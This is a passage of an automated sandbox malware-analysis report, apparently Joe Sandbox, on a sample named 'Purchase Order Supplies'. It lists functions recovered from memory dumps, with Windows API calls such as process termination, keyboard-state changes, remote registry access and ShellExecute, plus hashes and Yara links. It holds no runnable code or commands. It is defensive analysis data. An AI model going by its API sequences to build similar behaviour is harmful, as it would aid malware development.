                          • Instruction Fuzzy Hash: 7911A5B1550718BEF7106B64CC8EF9A7B2EDB58754F500419F344AB1E0CEF29C519AB4
                          Function 00CF1620 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CD6F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00CD6F7D
                            • Part of subcall function 00CD6F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00CD6F8D
                            • Part of subcall function 00CD6F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00CD7022
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CF168B
                          • GetLastError.KERNEL32 ref: 00CF169E
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CF16CA
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00CF1746
                          • GetLastError.KERNEL32(00000000), ref: 00CF1751
                          • CloseHandle.KERNEL32(00000000), ref: 00CF1786
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                          • String ID: SeDebugPrivilege
                          • API String ID: 2533919879-2896544425
                          • Opcode ID: 88f653b1ae62377ccd5f7452c4674fba11544717dc11bb93178bb0d3d21bc77f
                          • Instruction ID: aec296d75873180856755e726d1e9158d99b1d8507085a8acb49945f02889701
                          • Opcode Fuzzy Hash: 88f653b1ae62377ccd5f7452c4674fba11544717dc11bb93178bb0d3d21bc77f
                          • Instruction Fuzzy Hash: 9641CD71A00206AFDB04EF54C8A6FBDB7E5AF44304F08804AFA0A9F392DB74D944DB52
                          Function 00CF98D2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00CF9926
                          • SendMessageW.USER32(?,00001036,00000000), ref: 00CF993A
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?,SysListView32,00D2DBF0,?,?,?), ref: 00CF9954
                          • _wcscat.LIBCMT ref: 00CF99AF
                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00CF99C6
                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00CF99F4
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSend$Window_wcscat
                          • String ID: SysListView32
                          • API String ID: 307300125-78025650
                          • Opcode ID: ff8c91a942ebdf4725782b8746abd5f72b7d65621ebf50321f8c9861bc2aa088
                          • Instruction ID: ba7d8a33ae77486b8c6836630596f4937388d9c1318d67ec5eaf073641071014
                          • Opcode Fuzzy Hash: ff8c91a942ebdf4725782b8746abd5f72b7d65621ebf50321f8c9861bc2aa088
                          • Instruction Fuzzy Hash: 7141707190030DAFEF219F60CC85FEA7BB8EF08354F11446AF659A7291D7719A88DB24
                          Function 00CD6237 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                          Download Yara Rule
                          APIs
                          • LoadIconW.USER32(00000000,00007F03), ref: 00CD62D6
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: IconLoad
                          • String ID: blank$info$question$stop$warning
                          • API String ID: 2457776203-404129466
                          • Opcode ID: d80eb5e4786d2b7a019111dfad7857dc6e7327c5d02b032a36654ece91497763
                          • Instruction ID: f8eeddc400758f745be513fd3ee6d7f46bf8752aec090faf8ebb7a5bd100da07
                          • Opcode Fuzzy Hash: d80eb5e4786d2b7a019111dfad7857dc6e7327c5d02b032a36654ece91497763
                          • Instruction Fuzzy Hash: 1A11B771208343BFE7055B59DC92DAA73D89F16724B20002BFB11A6382EBA4AA4095B4
                          Function 00CD757B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 00CD7595
                          • LoadStringW.USER32(00000000), ref: 00CD759C
                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00CD75B2
                          • LoadStringW.USER32(00000000), ref: 00CD75B9
                          • _wprintf.LIBCMT ref: 00CD75DF
                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00CD75FD
                          Strings
                          • %s (%d) : ==> %s: %s %s, xrefs: 00CD75DA
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: HandleLoadModuleString$Message_wprintf
                          • String ID: %s (%d) : ==> %s: %s %s
                          • API String ID: 3648134473-3128320259
                          • Opcode ID: 611eedb77863137de7d24d0b0bc206a53fe0a982fe25696518e60f7a2a380ce3
                          • Instruction ID: 3384b1395fa71646a75f2a6ceff110a2805c776636a9350e20db12c4ebe7ec68
                          • Opcode Fuzzy Hash: 611eedb77863137de7d24d0b0bc206a53fe0a982fe25696518e60f7a2a380ce3
                          • Instruction Fuzzy Hash: C7016DF2900308BFE711ABA4AC89EEA776DDB08300F004492B746E2141EA789EC58B31
                          Function 00CF2A0A Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                            • Part of subcall function 00CF3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CF2AA6,?,?), ref: 00CF3B0E
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CF2AE7
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: BuffCharConnectRegistryUpper_memmove
                          • String ID:
                          • API String ID: 3479070676-0
                          • Opcode ID: 4e235ed89a7b517d46551d494873689bc4a5e3bcd87d0e621a0667f27bdc265c
                          • Instruction ID: befb929f1d4d85ec99824a7579d43f806f49d665354313df792463353b15b4d4
                          • Opcode Fuzzy Hash: 4e235ed89a7b517d46551d494873689bc4a5e3bcd87d0e621a0667f27bdc265c
                          • Instruction Fuzzy Hash: 9B918A31604205AFCB00EF54C895B6EB7E5FF88314F14880DFA969B2A1DB30E945EB42
                          Function 00CE9A66 Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON
                          Download Yara Rule
                          APIs
                          • select.WS2_32 ref: 00CE9B38
                          • WSAGetLastError.WS2_32(00000000), ref: 00CE9B45
                          • __WSAFDIsSet.WS2_32(00000000,?), ref: 00CE9B6F
                          • WSAGetLastError.WS2_32(00000000), ref: 00CE9B9F
                          • htons.WS2_32(?), ref: 00CE9C51
                          • inet_ntoa.WS2_32(?), ref: 00CE9C0C
                            • Part of subcall function 00CCE0F5: _strlen.LIBCMT ref: 00CCE0FF
                            • Part of subcall function 00CCE0F5: _memmove.LIBCMT ref: 00CCE121
                          • _strlen.LIBCMT ref: 00CE9CA7
                          • _memmove.LIBCMT ref: 00CE9D10
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
                          • String ID:
                          • API String ID: 3637404534-0
                          • Opcode ID: a74e211b211f2b42b4b060de73c5f454500fc24b8cb252b71ea2de208810c227
                          • Instruction ID: 0a3541eaf7afd5a7b3b03f9ae504126f61d19c09aa49513d6da44313904f4fb4
                          • Opcode Fuzzy Hash: a74e211b211f2b42b4b060de73c5f454500fc24b8cb252b71ea2de208810c227
                          • Instruction Fuzzy Hash: 4D81CE32504240AFCB10EF25CC85EABBBE9EF89714F14461DF556972A1DB30DE04DBA2
                          Function 00CBB72C Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __mtinitlocknum.LIBCMT ref: 00CBB744
                            • Part of subcall function 00CB8A0C: __FF_MSGBANNER.LIBCMT ref: 00CB8A21
                            • Part of subcall function 00CB8A0C: __NMSG_WRITE.LIBCMT ref: 00CB8A28
                            • Part of subcall function 00CB8A0C: __malloc_crt.LIBCMT ref: 00CB8A48
                          • __lock.LIBCMT ref: 00CBB757
                          • __lock.LIBCMT ref: 00CBB7A3
                          • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00D46948,00000018,00CC6C2B,?,00000000,00000109), ref: 00CBB7BF
                          • RtlEnterCriticalSection.NTDLL(8000000C), ref: 00CBB7DC
                          • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 00CBB7EC
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                          • String ID:
                          • API String ID: 1422805418-0
                          • Opcode ID: cdf7d10f3edf30c61a909eb74c70f26f8fac9a2ff4d53f7498b012c884881332
                          • Instruction ID: 82b72f7e4a4d7b2482e5b7cf99e5199502c4b33f5ad9170f8abb4f240eb6bd8a
                          • Opcode Fuzzy Hash: cdf7d10f3edf30c61a909eb74c70f26f8fac9a2ff4d53f7498b012c884881332
                          • Instruction Fuzzy Hash: 54412571D007159BEB109FA8D8443ECBBA8BF41336F148319E825AB2D1CBB59D05CFA0
                          Function 00CDA1B7 Relevance: 12.1, APIs: 8, Instructions: 100fileCOMMON
                          Download Yara Rule
                          APIs
                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 00CDA1CE
                            • Part of subcall function 00CB010A: std::exception::exception.LIBCMT ref: 00CB013E
                            • Part of subcall function 00CB010A: __CxxThrowException@8.LIBCMT ref: 00CB0153
                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00CDA205
                          • RtlEnterCriticalSection.NTDLL(?), ref: 00CDA221
                          • _memmove.LIBCMT ref: 00CDA26F
                          • _memmove.LIBCMT ref: 00CDA28C
                          • RtlLeaveCriticalSection.NTDLL(?), ref: 00CDA29B
                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00CDA2B0
                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00CDA2CF
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                          • String ID:
                          • API String ID: 256516436-0
                          • Opcode ID: b10230d9a006b24e37fe4258e58a3bd1a7cce7024719a61cb7b822a6b2364649
                          • Instruction ID: 05079cf8cc327e27ea65abf67d08c43cc8a539ba6696ca09c5038670cb93e2ee
                          • Opcode Fuzzy Hash: b10230d9a006b24e37fe4258e58a3bd1a7cce7024719a61cb7b822a6b2364649
                          • Instruction Fuzzy Hash: 4A317E31A00205ABCB00EFA9DC85AAEB7B9EF45310F1480A5F904EB256DB74DE55DBA1
                          Function 00CF8CDB Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                          Download Yara Rule
                          APIs
                          • DeleteObject.GDI32(00000000), ref: 00CF8CF3
                          • GetDC.USER32(00000000), ref: 00CF8CFB
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CF8D06
                          • ReleaseDC.USER32(00000000,00000000), ref: 00CF8D12
                          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00CF8D4E
                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00CF8D5F
                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00CFBB29,?,?,000000FF,00000000,?,000000FF,?), ref: 00CF8D99
                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00CF8DB9
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                          • String ID:
                          • API String ID: 3864802216-0
                          • Opcode ID: b4a78320504583450cbf74164a4fcaeaf9b324933773c8de4eb9330ff97f608d
                          • Instruction ID: 381e1510e358f5ff26993a2e9b5fa97ff71fc617358e9bb397202b22a9bacbeb
                          • Opcode Fuzzy Hash: b4a78320504583450cbf74164a4fcaeaf9b324933773c8de4eb9330ff97f608d
                          • Instruction Fuzzy Hash: 24317F72100618BFEB108F50CC49FEA3BAAEF49755F048055FE08DA291CB759942CB70
                          Function 00CAB40F Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 493943a6f923665bf29ace685a97605a994b91749922f114855f2a071fa52ef8
                          • Instruction ID: 39a29c31c28cc6e61d85c929b07b649e0da52b509fe0aa10d555c6f8a4307eaf
                          • Opcode Fuzzy Hash: 493943a6f923665bf29ace685a97605a994b91749922f114855f2a071fa52ef8
                          • Instruction Fuzzy Hash: 74715D7190020AFFCB15CF99CC48ABEBB75FF8A318F248159F915A6292C7349E41DB64
                          Function 00CF2121 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00CF214B
                          • _memset.LIBCMT ref: 00CF2214
                          • ShellExecuteExW.SHELL32(?), ref: 00CF2259
                            • Part of subcall function 00C984A6: __swprintf.LIBCMT ref: 00C984E5
                            • Part of subcall function 00C984A6: __itow.LIBCMT ref: 00C98519
                            • Part of subcall function 00C93BCF: _wcscpy.LIBCMT ref: 00C93BF2
                          • CloseHandle.KERNEL32(00000000), ref: 00CF2320
                          • FreeLibrary.KERNEL32(00000000), ref: 00CF232F
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                          • String ID: @
                          • API String ID: 4082843840-2766056989
                          • Opcode ID: 26a132a9f6328d1116b83bc7d765e5536ffce4044697bb821ac128d63b5bdb89
                          • Instruction ID: 1f72dc06bf0de8572e24cda88f5191ecfe4a22d49614545fd6f3acdca04f5752
                          • Opcode Fuzzy Hash: 26a132a9f6328d1116b83bc7d765e5536ffce4044697bb821ac128d63b5bdb89
                          • Instruction Fuzzy Hash: 4171BCB0A00619DFCF04EFA4C8949AEB7F5FF49310F108059E956AB361CB34AE40DB91
                          Function 00CD47DE Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetParent.USER32(?), ref: 00CD481D
                          • GetKeyboardState.USER32(?), ref: 00CD4832
                          • SetKeyboardState.USER32(?), ref: 00CD4893
                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 00CD48C1
                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 00CD48E0
                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00CD4926
                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00CD4949
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessagePost$KeyboardState$Parent
                          • String ID:
                          • API String ID: 87235514-0
                          • Opcode ID: 4ecadb001c96ef67b738ab0f50c77f6d68de7f0d9d5f0ea575bc2a892b178e6d
                          • Instruction ID: 2afe53f66e3614a717e88b1087afddce1f795d0be47f5dcbfa266a79888de81e
                          • Opcode Fuzzy Hash: 4ecadb001c96ef67b738ab0f50c77f6d68de7f0d9d5f0ea575bc2a892b178e6d
                          • Instruction Fuzzy Hash: 9551D5A05087D53FFB3A4325CC55BBBBF995B06304F08858AE3E5966C2C6E4EE84E750
                          Function 00CD45F9 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetParent.USER32(00000000), ref: 00CD4638
                          • GetKeyboardState.USER32(?), ref: 00CD464D
                          • SetKeyboardState.USER32(?), ref: 00CD46AE
                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00CD46DA
                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00CD46F7
                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00CD473B
                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00CD475C
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessagePost$KeyboardState$Parent
                          • String ID:
                          • API String ID: 87235514-0
                          • Opcode ID: 511e8b8290eeabcdffecc2c2dfaa2f5714705386d7cb7b9acfda39b9be615bf7
                          • Instruction ID: df4a5cc9b2be7d2b77924973c22126e0a987e05211ebc1e3f8115d4327a6db4e
                          • Opcode Fuzzy Hash: 511e8b8290eeabcdffecc2c2dfaa2f5714705386d7cb7b9acfda39b9be615bf7
                          • Instruction Fuzzy Hash: E751D6A05047D53FFB3A47248C45BBABF995B07304F08848AF3E546AC2D7A4EE95E760
                          Function 00CD86AE Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _wcsncpy$LocalTime
                          • String ID:
                          • API String ID: 2945705084-0
                          • Opcode ID: a5d30931d340539a8ea61036e4e4d7400833657758bfc63cc5cde7ef04b69fce
                          • Instruction ID: 0a29d1ee7e8c24c469a7f262721d1e690dbc044f690da7b419cb085e1a18c341
                          • Opcode Fuzzy Hash: a5d30931d340539a8ea61036e4e4d7400833657758bfc63cc5cde7ef04b69fce
                          • Instruction Fuzzy Hash: D1414D75C1021475DF10EBB4CC86ACFB7BCAF05310F958866EA24F3262EA30E25597A5
                          Function 00CF8DD5 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00CF8DF4
